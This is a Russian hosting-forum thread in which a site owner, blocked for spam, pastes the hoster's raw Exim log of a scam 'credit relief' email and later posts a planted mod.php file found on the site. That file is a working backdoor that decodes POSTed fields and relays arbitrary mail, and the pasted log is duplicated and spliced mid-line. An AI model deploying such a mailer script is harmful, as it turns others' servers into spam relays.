Перейти к содержанию
icecream

Ваша хостинговая площадка была заблокирована за SPAM помогите пожалуйста

Рекомендуемые сообщения

Доброго времени суток, уважаемые коллеги!

 

Сегодня получил от хостера письмо с причиной блокировки моей площадки, помогите пожалуйста добрыми советами, что делать, где копать ?

 

Если я не ошибаюсь, то спам рассылку ведёт почтовый сервер, а не сам скрипт с внедрёный в движок ?

 

 

Ваша хостинговая площадка #109642 - была заблокирована в соответствии с Приложением 1 к ПУБЛИЧНОМУ ДОГОВОРУ, пункт 2.11.1 раздела ”Общие правила предоставления услуг” подраздела ”Права и обязанности Заказчика”.

Причина - несанкционированная рассылка.

Пример рассылаемых сообщений:

1Waf1t-0007iR-17-H
cp2516** 1169 32008
<cp2516**@cpane**.logol.ru>
1397713113 0
-ident cp2516**
-received_protocol local
-body_linecount 116
-max_received_linelength 81
-auth_id cp2516**
-auth_sender cp2516**@cpane**.logol.ru
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX
1
nevuqa11@yahoo.com

190P Received: from cp2516** by cpane**.logol.ru with local (Exim 4.80)
(envelope-from <cp2516**@cpane**.logol.ru>)
id 1Waf1t-0007iR-17
for nevuqa11@yahoo.com; Thu, 17 Apr 2014 09:38:33 +0400
025T To: <nevuqa11@yahoo.com>
057 Subject: =?windows-1251?B?UmU6IO/uIO/u4u7k8yDq8OXk6PLg?=
079 X-PHP-Script: goods-price.ru/engine/mailout.php for 95.26.230.62, 95.26.230.62
043 X-PHP-Originating-Script: 1169:mailout.php
082I Message-ID: <D2C69F5444874A1384AEFDDEBD9D7B98@128-72-132-53.broadband.corbina.ru>
074R Reply-To: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <immmegzpns2@yandex.ru>
065F From: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <ssa963@yandex.ru>
038 Date: Thu, 17 Apr 2014 09:38:29 +0400
018 MIME-Version: 1.0
091 Content-Type: multipart/alternative;
boundary="----=_NextPart_000_08D5_01CF5A20.CA012640"
014 X-Priority: 3
026 X-MSMail-Priority: Normal
052 X-Mailer: Microsoft Windows Live Mail 14.0.8089.726
056 X-MimeOLE: Produced By Microsoft MimeOLE V14.0.8089.726
1Waf1t-0007iR-17-D
This is a multi-part message in MIME format.

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/plain;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9

=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=E0=F8 =EA=F0=E5=E4=E8=
=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=F0=E8 =EF=EE=EC=EE=F9=
=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=F1.
=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=E0=F2=E8=F2=FC =E1=
=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =FD=F2=EE =E4=E5=EB=E0=FE=
=F2 =E7=E0 =C2=E0=F1!

=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF =C2=E0=F1, =E5=F1=
=EB=E8:
=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =E7=E0 =EA=
=F0=E5=E4=E8=F2
=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 =E5=E6=E5=EC=E5=F1=
=FF=F7=ED=EE=E9 =EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.
=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=E0=F2=F3 =EF=EB=E0=
=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3
=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =EA=F0=
=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3
=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5, =E0 =E7=E0=F7=E0=F1=
=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5 =EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5
=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=FE =EA=F0=E5=E4=E8=F2=
=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8 =E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=
=EC
=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 "=ED=E0=E5=
=E7=E4=EE=E2" =EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=
=E2
=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=E0=F2=E8=F2=FC =E7=E0=
=EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5 =EF=EB=E0=F2=E5=E6=E8
=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 107 =F2=FB=F1=FF=F7 =E4=EE=
=EB=E3=EE=E2 =E7=E0 2 =E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2=
.
=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=EB =E1=EE=EB=E5=E5=
23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.

=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=E9=F7=E0=F1 =E8 =
=E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=EE=E2 - http://i=
s.gd/9LOjbF

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Dwindows-1251" http-equiv=3DContent-=
Type>
<META name=3DGENERATOR content=3D"MSHTML 9.00.8112.16437">
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft>=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dcenter>=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=
=E0=F8 =EA=F0=E5=E4=E8=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=
=F0=E8=20
=EF=EE=EC=EE=F9=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=
=F1.</DIV>
<DIV align=3Dcenter>=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=
=E0=F2=E8=F2=FC =E1=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =
=FD=F2=EE=20
=E4=E5=EB=E0=FE=F2 =E7=E0 =C2=E0=F1!</DIV>
<DIV align=3Dcenter> </DIV>
<DIV align=3Dleft>=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF=
=C2=E0=F1, =E5=F1=EB=E8:</DIV>
<UL>
<LI>
<DIV align=3Dleft>=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=
=E5=F2=E5 =E7=E0 =EA=F0=E5=E4=E8=F2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=
=F2 =E5=E6=E5=EC=E5=F1=FF=F7=ED=EE=E9=20
=EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.</DIV>
<LI>
<DIV align=3Dleft>=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=
=E0=F2=F3 =EF=EB=E0=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=
=E8=E2=E0=E5=F2=E5 =EA=F0=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3</DIV>
<LI>
<DIV align=3Dleft>=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5=
, =E0 =E7=E0=F7=E0=F1=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5=20
=EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =F3=EB=F3=F71Waf1t-0007iR-17-H
cp2516** 1169 32008
<cp251618@cpanel**.logol.ru>
1397713113 0
-ident cp2516**
-received_protocol local
-body_linecount 116
-max_received_linelength 81
-auth_id cp2516**
-auth_sender cp2516**@cpanel**.logol.ru
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX
1
nevuqa11@yahoo.com

190P Received: from cp2516** by cpanel9.logol.ru with local (Exim 4.80)
(envelope-from <cp2516**@cpanel**.logol.ru>)
id 1Waf1t-0007iR-17
for nevuqa11@yahoo.com; Thu, 17 Apr 2014 09:38:33 +0400
025T To: <nevuqa11@yahoo.com>
057 Subject: =?windows-1251?B?UmU6IO/uIO/u4u7k8yDq8OXk6PLg?=
079 X-PHP-Script: goods-price.ru/engine/mailout.php for 95.26.230.62, 95.26.230.62
043 X-PHP-Originating-Script: 1169:mailout.php
082I Message-ID: <D2C69F5444874A1384AEFDDEBD9D7B98@128-72-132-53.broadband.corbina.ru>
074R Reply-To: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <immmegzpns2@yandex.ru>
065F From: =?windows-1251?B?wuvg5OAg0e7q7uvu4uA=?= <ssa963@yandex.ru>
038 Date: Thu, 17 Apr 2014 09:38:29 +0400
018 MIME-Version: 1.0
091 Content-Type: multipart/alternative;
boundary="----=_NextPart_000_08D5_01CF5A20.CA012640"
014 X-Priority: 3
026 X-MSMail-Priority: Normal
052 X-Mailer: Microsoft Windows Live Mail 14.0.8089.726
056 X-MimeOLE: Produced By Microsoft MimeOLE V14.0.8089.726
1Waf1t-0007iR-17-D
This is a multi-part message in MIME format.

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/plain;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9

=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=E0=F8 =EA=F0=E5=E4=E8=
=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=F0=E8 =EF=EE=EC=EE=F9=
=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=F1.
=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=E0=F2=E8=F2=FC =E1=
=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =FD=F2=EE =E4=E5=EB=E0=FE=
=F2 =E7=E0 =C2=E0=F1!

=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF =C2=E0=F1, =E5=F1=
=EB=E8:
=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =E7=E0 =EA=
=F0=E5=E4=E8=F2
=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 =E5=E6=E5=EC=E5=F1=
=FF=F7=ED=EE=E9 =EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.
=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=E0=F2=F3 =EF=EB=E0=
=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3
=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=E8=E2=E0=E5=F2=E5 =EA=F0=
=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3
=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5, =E0 =E7=E0=F7=E0=F1=
=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5 =EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5
=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=FE =EA=F0=E5=E4=E8=F2=
=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8 =E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=
=EC
=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=F2 "=ED=E0=E5=
=E7=E4=EE=E2" =EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=
=E2
=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=E0=F2=E8=F2=FC =E7=E0=
=EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5 =EF=EB=E0=F2=E5=E6=E8
=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 107 =F2=FB=F1=FF=F7 =E4=EE=
=EB=E3=EE=E2 =E7=E0 2 =E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2=
.
=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=EB =E1=EE=EB=E5=E5=
23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.

=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=E9=F7=E0=F1 =E8 =
=E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=EE=E2 - http://i=
s.gd/9LOjbF

------=_NextPart_000_08D5_01CF5A20.CA012640
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Dwindows-1251" http-equiv=3DContent-=
Type>
<META name=3DGENERATOR content=3D"MSHTML 9.00.8112.16437">
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV align=3Dleft>=C7=E4=F0=E0=E2=F1=F2=E2=F3=E9</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dcenter>=CF=EE=EB=ED=EE=F1=F2=FC=FE =EE=EF=EB=E0=F2=E8=EC =C2=
=E0=F8 =EA=F0=E5=E4=E8=F2 =E7=E0 22% =EE=F2 =E5=E3=EE =F1=F3=EC=EC=FB, =EF=
=F0=E8=20
=EF=EE=EC=EE=F9=E8 =E8=ED=E2=E5=F1=F2=E8=F6=E8=E9 =E2 =E1=E8=E7=ED=E5=
=F1.</DIV>
<DIV align=3Dcenter>=D1=F2=EE=EF! =CF=E5=F0=E5=F1=F2=E0=ED=FC=F2=E5 =EF=EB=
=E0=F2=E8=F2=FC =E1=E0=ED=EA=F3! =CF=F3=F1=F2=FC =E4=F0=F3=E3=E8=E5 =
=FD=F2=EE=20
=E4=E5=EB=E0=FE=F2 =E7=E0 =C2=E0=F1!</DIV>
<DIV align=3Dcenter> </DIV>
<DIV align=3Dleft>=CD=E0=F8=E5 =EF=F0=E5=E4=EB=EE=E6=E5=ED=E8=E5 =E4=EB=FF=
=C2=E0=F1, =E5=F1=EB=E8:</DIV>
<UL>
<LI>
<DIV align=3Dleft>=CF=EE=F1=F2=EE=FF=ED=ED=EE =E2=FB=EF=EB=E0=F7=E8=E2=E0=
=E5=F2=E5 =E7=E0 =EA=F0=E5=E4=E8=F2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=F1=FF =EE=
=F2 =E5=E6=E5=EC=E5=F1=FF=F7=ED=EE=E9=20
=EE=EF=EB=E0=F2=FB =E7=E0=E9=EC=E0.</DIV>
<LI>
<DIV align=3Dleft>=CD=E5 =EC=EE=E6=E5=F2=E5 =EF=EE=EC=E5=ED=FF=F2=FC =E4=
=E0=F2=F3 =EF=EB=E0=F2=E5=E6=E0 =EF=EE =EA=F0=E5=E4=E8=F2=F3</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F1 =F2=F0=F3=E4=EE=EC =E2=FB=EF=EB=E0=F7=
=E8=E2=E0=E5=F2=E5 =EA=F0=E5=E4=E8=F2, =E8=EF=EE=F2=E5=EA=F3</DIV>
<LI>
<DIV align=3Dleft>=C1=E0=ED=EA=E8 =E1=E5=F0=F3=F2 =E2=FB=F1=EE=EA=E8=E5=
, =E0 =E7=E0=F7=E0=F1=F2=F3=FE =E8 =F1=EA=F0=FB=F2=FB=E5=20
=EA=EE=EC=E8=F1=F1=E8=EE=ED=ED=FB=E5</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =F3=EB=F3=F7=F8=E8=F2=FC =F1=E2=EE=
=FE =EA=F0=E5=E4=E8=F2=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8=20
=E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=EC</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=
=F1=FF =EE=F2 "=ED=E0=E5=E7=E4=EE=E2"=20
=EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=E2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=
=E0=F2=E8=F2=FC =E7=E0 =EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5=20
=EF=EB=E0=F2=E5=E6=E8</DIV></LI></UL>
<DIV align=3Dleft>=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 10=
7 =F2=FB=F1=FF=F7 =E4=EE=EB=E3=EE=E2 =E7=E0 2=20
=E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2.</DIV>
<DIV align=3Dleft>=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=
=EB =E1=EE=EB=E5=E5 23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dleft>=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=
=E9=F7=E0=F1 =E8 =E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=
=EE=E2 -=20
http://is.gd/9LOjbF</DIV></BODY></HTML>

------=_NextPart_000_08D5_01CF5A20.CA012640--


---------------------------------------------------------------
body hash: f93977fe0ad3f2e9b20733c9585a4c74=F8=E8=F2=FC =F1=E2=EE=
=FE =EA=F0=E5=E4=E8=F2=ED=F3=FE =E8=F1=F2=EE=F0=E8=FE =E8=20
=E2=FB=EF=EB=E0=F2=E8=F2=FC =E7=E0=E9=EC</DIV>
<LI>
<DIV align=3Dleft>=C2=FB =F5=EE=F2=E8=F2=E5 =E8=E7=E1=E0=E2=E8=F2=FC=
=F1=FF =EE=F2 "=ED=E0=E5=E7=E4=EE=E2"=20
=EA=EE=EB=EB=E5=EA=F2=EE=F0=F1=EA=E8=F5 =E0=E3=E5=ED=F2=F1=F2=E2</DIV>
<LI>
<DIV align=3Dleft>=D5=EE=F7=E5=F8=FC =EF=E5=F0=E5=F1=F2=E0=F2=FC =EF=EB=
=E0=F2=E8=F2=FC =E7=E0 =EA=EE=EC=EC=F3=ED=E0=EB=FC=ED=FB=E5=20
=EF=EB=E0=F2=E5=E6=E8</DIV></LI></UL>
<DIV align=3Dleft>=CC=FB =EF=EE=E3=E0=F1=E8=EB=E8 =E1=EE=EB=E5=E5 10=
7 =F2=FB=F1=FF=F7 =E4=EE=EB=E3=EE=E2 =E7=E0 2=20
=E3=EE=E4=E0 =E4=EB=FF 95210 =EA=EB=E8=E5=ED=F2=EE=E2.</DIV>
<DIV align=3Dleft>=CD=E0=F8 =EE=E1=EE=F0=EE=F2=ED=FB=E9 =EA=E0=EF=E8=F2=E0=
=EB =E1=EE=EB=E5=E5 23,000,000 =E4=EE=EB=EB=E0=F0=EE=E2.</DIV>
<DIV align=3Dleft> </DIV>
<DIV align=3Dleft>=CF=F0=EE=F1=EC=EE=F2=F0=E8=F2=E5 =EF=F0=FF=EC=EE =F1=E5=
=E9=F7=E0=F1 =E8 =E8=E7=E1=E0=E2=FC=F2=E5=F1=FC =EE=F2 =EA=F0=E5=E4=E8=F2=
=EE=E2 -=20
http://is.gd/9LOjbF</DIV></BODY></HTML>

------=_NextPart_000_08D5_01CF5A20.CA012640--


---------------------------------------------------------------
body hash: f93977fe0ad3f2e9b20733c9585a4c74

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ищите на сайте вирус , например это что goods-price.ru/engine/mailout.php. Смотрите как он туда мог попасть. Если есть возможность, восстановите сайт без вируса, а потом пишите хостеру о проделанной работе и просьбой разблокировать сайт.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ищите на сайте вирус , например это что goods-price.ru/engine/mailout.php. Смотрите как он туда мог попасть. Если есть возможность, восстановите сайт без вируса, а потом пишите хостеру о проделанной работе и просьбой разблокировать сайт.

 

Спасибо Вам большое за подсказку, видел там этот файл, снёс к чёрту этот сайт, всёё равно до него руки не доходят из-за нехатки времени.

 

Скажите пожалуйста, а как вы узнали, что это именно этот домен/сайт ? :)

Я просто в этом письме от хостера вообще ничего не понял )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

В корне сайта обнаружил файл mod.php

 

Его содержимое:

 

<?php
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
    {
    echo "indata_error";
    exit;
    }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
    echo "sent_ok";
else
    echo "sent_error";
?>

 

Я в php не силён, но кажется тут что то зашифровано .

 

В папке system обнаружил файл wp-mailer.php .

 

Подскажите пожалуйста, какие необходимо провести действия для полного устранения этого скрипта и избежать подобной ситуации?

Достаточно ли будет удалить эти два файла ?

Могли ли внедрить вредоносный код в системные файлы ?

 

Не знаю, что делать и в php не силён, помогите пожалуйста HALP , можно за денежку

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Искать дыры и вирусы за денежку, дело неблагодарное, если только за деньжища )) т.к возможен и рецидив... и все сначала..

 

да ничего не защифровано там, просто спамят с помощью вашего ресурса. Возможно попало через WP или Joomla или еще какие дыры. 

А какие действия... интернет полон рекомендациями что и как делать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.